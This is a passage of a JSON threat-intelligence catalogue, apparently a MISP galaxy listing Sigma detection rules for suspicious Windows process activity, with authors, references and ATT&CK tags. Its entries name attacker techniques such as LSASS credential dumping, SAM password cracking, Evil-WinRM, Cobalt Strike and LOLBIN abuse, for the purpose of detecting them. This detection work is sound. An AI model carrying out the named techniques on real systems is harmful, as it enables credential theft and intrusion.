"https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_diskshadow_child_process_susp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9f546b25-5f12-4c8d-8532-5893dcb1e4b8", "value": "Potentially Suspicious Child Process Of DiskShadow.EXE" }, { "description": "Detects calls to the \"terminate\" function via wmic in order to kill an application", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_terminate_application.yml", "level": "medium", "logsource.category": 
"process_creation", "logsource.product": "windows", "refs": [ "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", "https://cyble.com/blog/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_terminate_application.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "49d9671b-0a0a-4c09-8280-d215bfd30662", "value": "Application Terminated Via Wmic.EXE" }, { "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", "meta": { "author": "frack113", "creation_date": "2022-08-28", "falsepositive": [ "Legitimate use of Nim on developer systems" ], "filename": "proc_creation_win_pua_nimgrab.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nimgrab.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "74a12f18-505c-4114-8d0b-8448dd5485c6", "value": "PUA - Nimgrab Execution" }, { "description": "Adversaries may use Valid Accounts to log into a remote computer using Windows Remote Management (WinRM), for example via the Evil-WinRM tool. 
The adversary may then perform actions as the logged-on user.", "meta": { "author": "frack113", "creation_date": "2022-01-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_evil_winrm.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Hackplayers/evil-winrm", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_evil_winrm.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.006" ] }, "related": [ { "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a197e378-d31b-41c0-9635-cfdf1c1bb423", "value": "HackTool - WinRM Access Via Evil-WinRM" }, { "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", "meta": { "author": "frack113", "creation_date": "2021-12-27", "falsepositive": [ "Tools that use similar command line flags and values" ], "filename": "proc_creation_win_hktl_hashcat.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat", "https://hashcat.net/wiki/doku.php?id=hashcat", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_hashcat.yml" ], "tags": [ "attack.credential-access", "attack.t1110.002" ] }, "related": [ { "dest-uuid": "1d24cdee-9ea2-4189-b08e-af110bf2435d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", "value": "HackTool - Hashcat Password Cracker Execution" }, { "description": "Detects the execution of \"forfiles\" from a non-default location, in order to potentially spawn a custom \"cmd.exe\" from the current working directory.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Anish Bogati", "creation_date": "2024-01-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_forfiles_child_process_masquerading.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2023/12/31/1-little-known-secret-of-forfiles-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f53714ec-5077-420e-ad20-907ff9bb2958", "value": "Forfiles.EXE Child Process Masquerading" }, { "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords.\nThis was seen being used in combination with \"icacls\" and other utilities to spot misconfigured files or folders permissions.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_findstr_recon_everyone.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml" ], "tags": [ "attack.credential-access", "attack.t1552.006" ] }, "related": [ { "dest-uuid": "8d7bd4f5-3a89-4453-9c82-2c8894d5655e", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "47e4bab7-c626-47dc-967b-255608c9a920", "value": "Permission Misconfiguration Reconnaissance Via Findstr.EXE" }, { "description": "Detects a certain command line flag combination used by \"devinit.exe\", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_devinit_lolbin_usage.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1460815932402679809", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "90d50722-0483-4065-8e35-57efaadd354d", "value": "Arbitrary MSI Download Via Devinit.EXE" }, { "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_stdin_redirect.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md", "https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_stdin_redirect.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "241e802a-b65e-484f-88cd-c2dc10f9206d", "value": "Read Contents From Stdin Via Cmd.EXE" }, { "description": "Detects possible password spraying attempts using Dsacls", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Legitimate use of dsacls to bind to an LDAP session" ], "filename": "proc_creation_win_dsacls_password_spray.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ss64.com/nt/dsacls.html", "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", "value": "Potential Password Spraying Attempt Using Dsacls.EXE" }, { "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "creation_date": "2022-06-14", "falsepositive": [ "Legitimate use via a batch script or by an administrator." ], "filename": "proc_creation_win_lolbin_pcalua.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Pcalua/", "https://pentestlab.blog/2020/07/06/indirect-command-execution/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", "value": "Use of Pcalua For Execution" }, { "description": "Detects potential process patterns related to Cobalt Strike beacon activity", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-07-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f35c5d71-b489-4e22-a115-f003df287317", "value": "Potential CobaltStrike Process Patterns" }, { "description": "Detects usage of the PsLogList utility to dump event 
log in order to extract admin accounts and perform account discovery or delete event logs", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-18", "falsepositive": [ "Another tool that uses the command line switches of PsLogList", "Legitimate use of PsLogList by an administrator" ], "filename": "proc_creation_win_sysinternals_psloglist.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList", "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", "https://twitter.com/EricaZelic/status/1614075109827874817", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psloglist.yml" ], "tags": [ "attack.discovery", "attack.t1087", "attack.t1087.001", "attack.t1087.002" ] }, "related": [ { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", "value": "Suspicious Use of PsLogList" }, { "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml", "level": "high", "logsource.category": "process_creation", 
"logsource.product": "windows", "refs": [ "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84232095-ecca-4015-b0d7-7726507ee793", "value": "Suspicious DLL Loaded via CertOC.EXE" }, { "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-17", "falsepositive": [ "False positives might occur if the users are unaware of such control checks" ], "filename": "proc_creation_win_winget_add_insecure_custom_source.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", 
"value": "Add Insecure Download Source To Winget" }, { "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-10", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_sftp.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/pull/264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a85ffc3a-e8fd-4040-93bf-78aff284d801", "value": "Use Of The SFTP.EXE Binary As A LOLBIN" }, { "description": "Detects the execution of a renamed version of the \"Mavinject\" process. 
Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", "meta": { "author": "frack113, Florian Roth", "creation_date": "2022-12-05", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_renamed_mavinject.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://twitter.com/gN3mes1s/status/941315826107510784", "https://twitter.com/Hexacorn/status/776122138063409152", "https://github.com/SigmaHQ/sigma/issues/3742", "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", "https://reaqta.com/2017/12/mavinject-microsoft-injector/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055.001", "attack.t1218.013" ] }, "related": [ { "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1bae753e-8e52-4055-a66d-2ead90303ca9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e6474a1b-5390-49cd-ab41-8d88655f7394", "value": "Renamed Mavinject.EXE Execution" }, { "description": "Detects the command line executed when TeamViewer starts a session started by a remote host.\nOnce a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer 
folder.\n", "meta": { "author": "Josh Nickels, Qi Nan", "creation_date": "2024-03-11", "falsepositive": [ "Legitimate usage of TeamViewer" ], "filename": "proc_creation_win_remote_access_tools_teamviewer_incoming_connection.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_teamviewer_incoming_connection.yml" ], "tags": [ "attack.initial-access", "attack.t1133" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ab70c354-d9ac-4e11-bbb6-ec8e3b153357", "value": "Remote Access Tool - Team Viewer Session Started On Windows Host" }, { "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-09-20", "falsepositive": [ "Command lines that use the same flags" ], "filename": "proc_creation_win_renamed_createdump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", "https://twitter.com/bopin2020/status/1366400799199272960", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_createdump.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"1a1ed54a-2ba4-4221-94d5-01dee560d71e", "value": "Renamed CreateDump Utility Execution" }, { "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", "meta": { "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "creation_date": "2021-11-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lsass_process_clone.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", "https://twitter.com/Hexacorn/status/1420053502554951689", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_process_clone.yml" ], "tags": [ "attack.credential-access", "attack.t1003", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", "value": "Potential Credential Dumping Via LSASS Process Clone" }, { "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", "meta": { "author": "Nik Seetharaman", "creation_date": "2018-07-16", "falsepositive": [ "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "filename": "proc_creation_win_cmstp_execution_by_creation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218.003", "attack.g0069", "car.2019-04-001" ] }, "related": [ { "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", "value": "CMSTP Execution Process Creation" }, { "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", "meta": { "author": "frack113", "creation_date": "2022-01-30", "falsepositive": [ "Scripts created by developers and admins", "Administrative activity" ], "filename": "proc_creation_win_takeown_recursive_own.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/takeown", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_takeown_recursive_own.yml" ], "tags": [ "attack.defense-evasion", "attack.t1222.001" ] }, "related": [ { "dest-uuid": "34e793de-0274-4982-9c1a-246ed1c19dee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "554601fb-9b71-4bcc-abf4-21a611be4fde", "value": "Suspicious Recursive Takeown" }, { "description": "Detects a potentially suspicious execution from an uncommon folder.", "meta": { "author": "Florian Roth (Nextron Systems), Tim Shelton", "creation_date": "2019-01-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_execution_path.yml", 
"level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", "value": "Process Execution From A Potentially Suspicious Folder" }, { "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2021-12-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_image_missing.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://pentestlaboratories.com/2021/12/08/process-ghosting/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "71158e3f-df67-472b-930e-7d287acaa3e1", "value": "Execution Of Non-Existing File" }, { "description": "Detects calls to base64 encoded WMI class such as \"Win32_ShadowCopy\", \"Win32_ScheduledJob\", etc.", "meta": { "author": "Christian Burkard (Nextron Systems), Nasreddine 
Bencherchali (Nextron Systems)", "creation_date": "2023-01-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_base64_wmi_classes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1816994b-42e1-4fb1-afd2-134d88184f71", "value": "PowerShell Base64 Encoded WMI Classes" }, { "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-24", "falsepositive": [ "Legitimate use by administrators" ], "filename": "proc_creation_win_pua_nircmd.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.nirsoft.net/utils/nircmd2.html#using", "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.nirsoft.net/utils/nircmd.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4e2ed651-1906-4a59-a78a-18220fca1b22", "value": "PUA - NirCmd Execution" }, { "description": "Detects usage of the WMI class \"Win32_NTEventlogFile\" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_nteventlogfile_usage.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "caf201a9-c2ce-4a26-9c3a-2b9525413711", "value": "Potentially Suspicious Call To Win32_NTEventlogFile Class" }, { "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", "meta": { "author": "_pete_0, TheDFIRReport", "creation_date": "2022-05-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4f154fb6-27d1-4813-a759-78b93e0b9c48", "value": "Operator Bloopers Cobalt Strike Modules" }, { "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wab_unusual_parents.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" ], "tags": [ "attack.defense-evasion", "attack.execution" ] }, "uuid": "63d1ccc0-2a43-4f4b-9289-361b308991ff", "value": "Wab/Wabmig 